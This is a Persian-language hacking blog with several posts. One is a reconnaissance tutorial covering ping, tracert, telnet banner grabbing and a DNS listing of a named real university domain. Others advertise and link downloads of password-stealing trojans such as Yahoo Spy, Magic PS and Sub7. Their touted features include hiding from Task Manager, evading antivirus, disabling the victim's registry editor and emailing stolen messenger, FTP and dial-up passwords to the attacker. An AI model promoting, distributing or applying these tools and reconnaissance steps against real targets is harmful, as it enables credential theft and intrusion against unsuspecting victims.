XF استاندارد سايت iss.net براي vul هاست. XF به صورت يک نام (نه عدد) نام‌گذاري مي‌شوند و اونو بايد در صفحه زبر بخونين:

http://www.iss.net/security_center/search.php

که وقتي در اين صفحه search کنيد، يک سري صفحات static بدست مياد که بايد بخونين.

۴- CA يا CERT:
سايت cert.org براي vul ها از اسم CA استفاده مي‌کند، مثل CA-2002-19 براي CA ها صفحه زير رو ببينيد:

http://www.cert.org/advisories/xxxxxxxxx.html

به‌جاي xxxxxxxxx مثلا مي‌نويسيم: CA-2002-19
ضمنا دقت کنيد که وقتي مطالب مربوط به يک vul رو از سايت cert مي‌خونيد، ملاحظه مي‌کنيد که لينک‌هايي به صورت VU#xxxxx در آن هست که به جاي xxxx يک عدد نوشته شده مثلا 369347 که اين VU# رو مي‌تونيد از اينجا بخونيد:

http://www.kb.cert.org/vuls/id/xxxxxx

۵- و …

- چگونه vul هايي که يه سرور داره رو پيدا کنيم؟

خوب اين موضوع کاملا بستگي به سطح اطلاعات شما داره:

۱- جوجه هکرها و هکرهاي تازه‌کار:
جوجه هکرها و نيز هکرهاي تازه کار (قابل احترام) واسه پيدا کردن vul هاي مربوط به يک سرور از security scanner ها يا vulnerability scanner ها يا Vulnerability Analysis استفاده مي‌کنند. به کمک vul scanner مي‌توان يک ip خاص رو به صورت اتوماتيک اسکن کرد تا ببينيم چه سوراخ‌هايي داره که اونا رو exploit کنيم. بعد از اسکن يک ip يک سري CVE به ما ميده که اونا رو بايد بخونيم.

۲- هکرهاي پيش‌کسوت:
هکرهاي پيش کسوت با تجربه‌اي که دارند مي‌دونند که مثلا اگه يه سرور از IIS 5.0 استفاده مي‌کنه، چه vul هايي براي اون هست پس وقتشون رو با اسکن کردن تلف نمي‌کنند. تجربه چيزي است که به‌تدريج بدست مي‌آوريد، پس زياد عجله نکنيد.

آموزش هک سایت قسمت دوم پیدا کرد یک باگ

در این قسمت طریقه ی پیدا کردن یک باگ را بر روی سرور و یا سیستم آموزش میدم

توجه کنید که باگ بر روی برنامه ای که یک پورت با آن برنامه کار میکند وجود دارد.

ping چيست ؟

ping دستوری است که مشخص می‌کند که آيا يک کامپيوتر خاص که ما ip يا domain آن را می‌دانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بسته‌های tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است.
کاربرد اين دستور به صورت زير است:

ping ip-or-domain

که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را می‌گذاريم.

مثلا ping sazin.com را در command prompt تايپ کردم و به نتايج زير رسيدم :

Pinging sazin.com [63.148.227.65] with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=981ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 851ms, Maximum =  1402ms, Average =  1043ms

اين نتايج نشان می‌دهد که sazin.com فعال است.

حالا به کامپيوتری با ip شماره 63.148.227.65 (که همان sazin.com است)، ping می‌کنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنای مدت زمان رسيدن پکت را می‌دهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر می‌کنم :

Pinging 63.148.227.65 with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=861ms TTL=105
Reply from 63.148.227.65: bytes=32 time=852ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Reply from 63.148.227.65: bytes=32 time=881ms TTL=105
 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 851ms, Maximum =  881ms, Average =  861ms

فرض کنيد که به يک ip که فعال نيست، ping کنيم:

Pinging 217.66.196.1 with 32 bytes of data:
 
Request timed out.
Request timed out.
Request timed out.
Request timed out.
 
Ping statistics for 217.66.196.1:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum =  0ms, Average =  0ms

که نشان می‌دهد که آن ip در آن لحظه فعال نيست.

البته تمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصل شده‌ايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما به درستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيدا کردن ايراد در شبکه است.

- tracert چيست ؟

tracert ( در يونيکس می‌شود traceroute ) ابزاری است که نشان می‌دهد که يک packet اطلاعاتی از کامپيوتر شما چه مسيری را طی می‌کند و از چه کامپيوترهايی می‌گذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص می‌کنيم و معمولا همان کامپيوتری است که داريم footprinting می‌کنيم.

کاربرد اين دستور به صورت زير است:

tracert ip-or-domain

مثلا می‌خواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به sazin.com برسيم. برای اينکار می‌توان از يکی از دستورهای زير استفاده کرد:

tracert sazin.com
tracert 63.148.227.65

به نتيجه زير رسيدم:

Tracing route to sazin.com [63.148.227.65]
over a maximum of 30 hops:
 
  1   160 ms   160 ms   160 ms  217.218.84.3
  2   381 ms   691 ms  1772 ms  217.218.84.5
  3     *        *     2324 ms  217.218.77.1
  4   201 ms  1101 ms   180 ms  217.218.0.252
  5   341 ms   220 ms   180 ms  217.218.0.2
  6  1993 ms   180 ms   181 ms  217.218.158.41
  7   180 ms   160 ms   160 ms  195.146.63.101
  8  2824 ms     *        *     195.146.32.134
  9  1472 ms  1463 ms   871 ms  195.146.33.73
 10   791 ms   841 ms   811 ms  if-1....eglobe.net [207.45.218.161]
 11  1692 ms     *     2654 ms  if-4-....eglobe.net [207.45.222.77]
 12  1282 ms   891 ms  1052 ms  if-1-....globe.net [207.45.220.245]
 13   902 ms   931 ms   881 ms  if-15.....globe.net [66.110.8.134]
 14   931 ms   861 ms   871 ms  if-8-....leglobe.net [64.86.83.174]
 15   901 ms   841 ms   852 ms  if-5-.....globe.net [207.45.223.62]
 16   841 ms   862 ms   851 ms  pos6-.....vel3.net [209.0.227.33]
 17   841 ms   842 ms   941 ms  so-4-1.....vel3.net [209.247.10.205]
 18   882 ms   931 ms   851 ms  so-0-1....vel3.net [209.247.11.197]
 19   871 ms   891 ms   951 ms  gige9....vel3.net [209.247.11.210]
 20  1011 ms   851 ms   902 ms  unknown.Level3.net [63.208.0.94]
 21   852 ms     *      882 ms  64.156.25.74
 22   961 ms   942 ms   841 ms  63.148.227.65
 
Trace complete.

اين نتايج نشان می‌دهد که بايد از ۲۲ کامپيوتر بگذرم تا به sazin.com برسم. اين اطلاعات همان‌طور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيدا کردن فايروال‌ها و ... است. (بعضی سطرها رو کوتاه کردم و به‌جاش .... گذاشتم)

tracert دارای تعدادی switch است که دوتاش رو توضيح می‌دم:

d-   ==>
با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده می‌شود.
مثلا می‌نويسيم:   tracert sazin.com -d

h max-hops-   ==>
حداکثر تعداد گام‌ها را تعيين می‌کند. حالت پيش‌فرض ۳۰ است.
مثلا می‌نويسيم:   tracert sazin.com -h 50

از اين دستور بعدا بسيار استفاده خواهيم کرد.

- ادامه بحث telnet

telnet هم جزو مواردی است که در footprinting مورد استفاده قرار می‌گيرد. کاربرد آن در حالتيست که بخواهيم بدانيم که روی فلان پورت چه برنامه‌ای فال‌گوش‌ه و version آن چنده. به اين صورت که به يک پورت خاص (که مي‌دانيم روی آن سرور باز است) تلنت می‌کنيم و بعد می‌بينيم که نتايجی ظاهر می‌شود که نشان‌دهنده اطلاعاتی‌ است که به‌کار می‌رود. گاهی با مکثی طولانی مواجه می‌شويم و هيچ چيزی نمايش داده نمی‌شود، در اين حالت يکی دوبار , Ctrl+Z , Ctrl+D , Ctrl+C , Ctrl+break را می‌زنيم و خارج می‌شويم. در مثال پايين جمع‌بندی مواردی که تا حالا از footprinting گفته‌ام را می‌آورم.

- جمع‌بندی مطالب گفته شده و بررسی يک سايت

فرض کنيد می‌خواهيم در مورد www.iums.ac.ir اطلاعاتی کسب کنيم :

◊ اول به سايت پينگ می‌کنم و ip آن را به‌دست می‌آورم: 194.225.184.15

◊ به کمک ip که به‌دست آورديم، به کمک يک پورت اسکنر پورت‌ها را بررسی می‌کنيم و می‌بينيم که پورت‌هايی مثل ۲۱، ۲۵، ۴۲، ۵۳، ۸۰، ۱۱۰، ۱۱۹، ۱۳۹، ۱۴۳ و ... باز است.

◊ چون domain به ir ختم می‌شود، برای whois کردن از whois.nic.ir استفاده می‌کنم و Name Server آن را به دست می‌آورم که 194.225.184.20 است.

◊ به کمک اين Name Server ، يک nslookup می‌کنم و به نتايج زير می‌رسم:

 iums.ac.ir.                    SOA    sina.i........0 345600)
 iums.ac.ir.                    NS     sina.iums.ac.ir
 iums.ac.ir.                    NS     ns1.nic.ir
 iums.ac.ir.                    MX     10   sina.iums.ac.ir
 smtp.iums.ac.ir.               A      195.146.34.181
 sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6
 sina.iums.ac.ir.               MX     10   sina.iums.ac.ir
 sina.iums.ac.ir.               A      194.225.184.20
 sina.iums.ac.ir.               A      195.146.34.181
 sun.iums.ac.ir.                CNAME  sina.iums.ac.ir
 cisco.iums.ac.ir.              CNAME  router.iums.ac.ir
 webmail.iums.ac.ir.            A      195.146.34.181
 linux.iums.ac.ir.              A      194.225.184.19
 linux.iums.ac.ir.      HINFO  Intel-Xeon/800  RedHat-Linux-7.2
 mta.iums.ac.ir.                A      195.146.34.181
 pop3.iums.ac.ir.               CNAME  sina.iums.ac.ir
 localhost.iums.ac.ir.          A      127.0.0.1
 proxy.iums.ac.ir.              CNAME  arvand.iums.ac.ir
 www.iums.ac.ir.                A      195.146.34.180
 atrak.iums.ac.ir.              A      194.225.184.14
 ns1.iums.ac.ir.                CNAME  sina.iums.ac.ir
 arvand.iums.ac.ir.             A      194.225.184.13
 router.iums.ac.ir.             A      194.225.184.1
 router.iums.ac.ir.     HINFO  Cisco3640/Access-Server  IOS-IP-12.0
 iums.ac.ir.                    SOA    sina.iu.......3456000 345600)

تک تک سطرهای اين نتايج کاربرد دارد که خواهيم رسيد. الان فقط در مورد HIFNO صحبت می‌کنم که برای مشخص تر بودن در بالا به صورت کمی فرورفته‌تر نوشتم. مثلا:

sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6

HIFNO برای تعيين نوع کامپيوتر و سيستم‌عامل سرور اهميت دارد. در اين سطر مشخص است که sina.iums.ac.ir از Sun-SuperSPARC5/75 UNIX-Solaris-2.6 استفاده می‌کند.

◊ چون پورت‌های باز را هم توسط پورت اسکنر به دست آورده‌ام به آنها تلنت می‌کنم با دستور:
telnet www.iums.ac.ir portnum
نتايج حاصل از بعضی را می‌بينيد:

25 :
... master.iums.ac.ir Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at 220
پس پورت ۲۵ (smtp) در آن کامپيوتر از Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 استفاده می‌کند.

110 :
.OK Microsoft Exchange 2000 POP3 server version 6.0.5762.3 (master.iums.ac.ir) ready+
پس پورت ۱۱۰ (pop3) در آن کامپيوتر از Microsoft Exchange 2000 POP3 server version 6.0.5762.3 استفاده می‌کند.

119 :
NNTP Service 5.00.0984 Version: 5.0.2195.2966 Posting Allowed

و …

2 نوشته شده در دوشنبه بيست و هفتم تير 1384ساعت 14:9 توسط محسن ترفند | نظر بدهید

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 14:36 توسط محمد هکر |

ActMon-PwdRec

http://http://www8.fixdown.com:2005/endown/ngnapr43-2004-12-20.rarاین برنامه همونطور که تو عکسش معلومه برای اینه که بتونید باهاش رمزهای از نوع ستاره ای یا رمزهای توپی که در ویندوز ایکس پی هستش رو ببینید و در اصطلاح اونا رو بازیابی کنید.

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 1:38 توسط محمد هکر |

hack

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 1:34 توسط محمد هکر |

hack

E:\booter

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 1:22 توسط محمد هکر |

yahoo spay

بالاخره نسخه کامل برنامه Yahoo Spy آماده شد و مشکلاتی که در نسخه آزمایشیه آن وجود داشت بر طرف شد. در نسخه قبلی مشکل کوچیکی وجود داشت و پسوردها به ایمیل ارسال نمیشد ولی در این نسخه تمامی مشکلاتش حل شده و اگر یادتون باشه گفته بودم که برنامه قادره رمز ذخیره شده در یاهو مسنجر را برای شما بصورت کد ارسال کنه و روشی را برای دیکد کردنش گفتم اما آقا مهرداد زحمت کشیدند و در این نسخه یه برنامه دیکدر هم براتون ساختند که کافیه آیدی و کدی که به ایمیلتان ارسال میشه را به برنامه بدید و روی کلید start کلیک کنید تا برنامه کد را برای شما به رمز اصلی بتدیل نماید و به شما نمایش دهد. همچنین قابلیت اضافه کردن آیکون و تغییر نام فایل ساخته شده و افزودن و کم کردن قابلیتهای فایل ساخته شده هم به برنامه اضافه شده و البته همونطور که در عکس برنامه و در خود برنامه میبینید ۴ قابلیت برنامه غیر فعاله و در نسخه های بعدی آماده میشه . پس اگر میخواهید قدرتمندترین تروجان را در اختیار داشته باشید هر چه سریعتر دانلود کنید.

توجه۱ : چنانچه از یاهو مسنجر نسخه ۵ استفاده میکنید هنگام Decode کردن رمز احتمال داره که مسنجر شما بطور اتوماتیک با آیدی فردی که هک شده لوگین بشه . شما در این لحظه باید بدون اینکه پنجره برنامه Decoder را ببندید ٬ مسنجر را Logout نمایید و پس از Logout کردن مسنجر ٬ برنامه Decoder رمز عبور آیدی مورد نظر را به شما نشان میدهد.
توجه۲ : در این نسخه ٬ برنامه رمز اشتراک اینترنت را نیز ارسال میکند ولی رمزهایی کسانی را میفرسته که از طریق internet explorer به اینترنت وصل میشوند و رمزهای کسانی که از کاننکشن ویندوز به اینترنت وصل میشودن را نمیفرسته ولی در نسخه بعدی قابلیت ارسال تمامی رمزهای اشتراک اینترنت هم اضافه میشه .

قابلیتها :
۱- پنهان بودن در Task manager(اولین تروجان ایرانی با این قابلیت)
۲- پنهان در برنامه هایی که استارت آپ شما را مونیتور میکنند .
۳-قربانی نمیتواند آن را به آسانی از سیستم خود پاک کند.
۴- هیچ ویروس یابی نمیشناسش.
۵- از همه فایروالها رد میشه.
۶- رمزهای بدست آمده را به ایمیل شما ارسال میکند.
۷- رمزهای یاهو مسنجر و Msn , Ftp , رمز Dialup را برای شما میفرسته.
۸- رمزهای یاد شده را در همان لحظه اجرای برنامه و در کمتر از ۵ ثانیه ارسال میکنه.
۹- به تمام سرورهای ایمیل قادره ایمیل بفرسته .(Yahoo,Hotmail,Msn,Google,...)
۱۰- وقتی قربانی سعی در پاک کردن آن داشته باشه رجیستری قربانی را غیر فعال میکند.
۱۱- روی تمام ویندوزهای ۹۵ به بالا کار میکنه و حتی روی لانگهورن هم کار میکنه.
۱۲- روی تمام نسخه های یاهو مسنجر کار میکنه و حتی توپی های جای پسورد یاهو هم تغییر نمیده و هیچ جای شکی به جا نمیذاره.
۱۳- غیر فعال کردن برخی از برنامه های ویروسیاب
۱۴- توسط پکر جدیدی درست میشه و هیچ ویروسیاب و تروجان یاب و ... نمیتونه پیداش کنه.
۱۵- در کمتر از ۵ ثانیه ایمیل را ارسال میکنه.

دانلودبرای هک کردن پسوردها

دانلودبرای Decode کردن رمزهای ارسالی

دانلودبرای چسباندن دلخواه فایل به تروجانی که میسازید

Yahoo Spy Contain:
1- Hide Of TaskManager.
2- Hide of Startup Monitors.
3- User Can't Delete it Easy.
4- AVS can't Detect it.
5- Firewalls Can't Stop it.
6- Send To Mail Box.
7- Send Yahoo,Msn,FTP,Dial Password.
8- Disable Registry Editor when user try for delete it.
9- Send To All Mail Servers. (Yahoo,Hotmail,Msn,Google,...)
10- Full Supporting win 9x-me-nt-2k-xp-2k3 and LongHorn.
11- Fixed for all Versions of yahoo messenger 5x-6x.
12- Recover Asterisk XP/2000 Password Very Nice without change password icon.
13- Destroy Some Monitors Software
14- Pack With New Packer and AVS can't Detect it.
15- Send Mail Very Fast. (less than 5 second).

محمد هکر

نظر یادتون نره

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 0:33 توسط محمد هکر |

magic-ps

این هم باز یه تروجان دیگه که همه میشناسیدش بله. مجیک پی اس خودمونه! این نسخه این تروجان هم هیچ ویروسیابی نمیشناسه و قابلیت ارسال رمز مسنجر یاهو از طریق پی ام را داره فقط و از تسک منجر هم پنهان نیست ولی باز بد نیست . اگر مشتری این برنامه هستید دانلودش کنید .

http://ircrackerz.com/downloads/Magic_PS_15se.zip

+ نوشته شده در دوشنبه بیست و هفتم تیر 1384ساعت 0:21 توسط محمد هکر |

دانلود

+ نوشته شده در یکشنبه بیست و ششم تیر 1384ساعت 22:7 توسط محمد هکر |

sub7

+ نوشته شده در یکشنبه بیست و ششم تیر 1384ساعت 22:1 توسط محمد هکر |

محمد هکر

هک اکانت از ای. اس. پی

هک اکانت از آی اس پی هایی که با asp.netطراحي شدن

هک کردن سایتها با پی اچ پی نوک

فرستادن و اجرای مخفی یک فایل اجرایی در کامپيوتر

استفاده راحت از شكلكهاي ياهو Yahoo smily !! و چند مطلب جالب كه ازگشتن داخل سايتها پيدا كردم:

شکل ياهوی خود را عوض کنيد

اموزش هک

محمد هکر

emil و yhoo spay و magic ps

ترفتدهای ياهو

چگونه قفل ايميل خود را باز کنيم

سایت هک

سایت هک و هک کردن گیم نت

تر فند

تریقه بدست اوردن ip

yahoo spay

شکل یاهو

هک کردن يک سايت

آموزش حال گیری(اینم یه جورشه دیگه)

اینارو با magic-ps هک کردم

اوز کردن ip

هک

اموزش

ActMon-PwdRec

hack

hack

yahoo spay

magic-ps

نوشته های پیشین

پیوندها